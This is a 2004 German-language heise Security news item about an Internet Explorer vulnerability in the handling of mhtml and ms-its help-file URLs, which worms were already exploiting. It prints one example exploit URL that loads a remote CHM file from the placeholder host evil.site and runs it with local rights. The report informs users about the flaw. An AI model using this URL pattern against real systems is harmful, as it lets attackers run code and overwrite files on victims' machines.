News-Meldung vom 30.03.2004 14:12
Bereits vor einigen Wochen hatte Thor Larholm auf eine kritische Schwachstelle des Internet Explorer im Umgang mit Hilfedateien hingewiesen. Mittlerweile sind konkrete Details zu dem Sicherheitsproblem veröffentlicht, und erste Würmer und Websites nutzen es aus, um die Rechner von IE-Anwendern zu infizieren. Zum Glück waren die ersten Exemplare recht ineffizient und fanden keine große Verbreitung.
Das Problem lässt sich auf einen simplen Redirect zurückführen. Gibt man in einer mhtml-URL eine Hilfeseite an, die nicht existiert, dann lädt der Internet Explorer eine zweite Hilfedatei und startet diese mit den Rechten der ersten. Existiert C:\foo.mht nicht, so öffnet
ms-its: mhtml:file://C:\foo.mht!http://evil.site/exploit.chm::exploit.htm
die externe Hilfedatei, als wäre es eine lokale. Diese kann dann unter anderem Dateien nachladen und Dateien auf dem lokalen Rechner überschreiben. Betroffen sind alle Versionen des Internet Explorer ab 5.0.1, von Microsoft gibt es bisher keine Stellungnahme zu dem Problem. Auf dem c't-Browsercheck von heise Security können Sie testen, ob Ihr System verwundbar ist. Eine harmlose Version der Demo legt lediglich eine neue Datei an, die "scharfe" überschreibt Notepad.exe und startet dieses Programm.
Siehe dazu auch:
(ju)
Version zum Drucken | Per E-Mail versenden
Permalink: http://heise.de/-96259
Themen-Forum Desktopsicherheit
Dank der redaktionseigenen Glaskugel präsentiert heise Security schon jetzt und wie immer exklusiv den ultimativen Jahresrückblick auf das vor uns liegende Jahr 2012. 
Wer veraltete Programmversionen von Firefox, Thunderbird und SeaMonkey nutzt, kann sein System leicht mit Schadcode infizieren. 
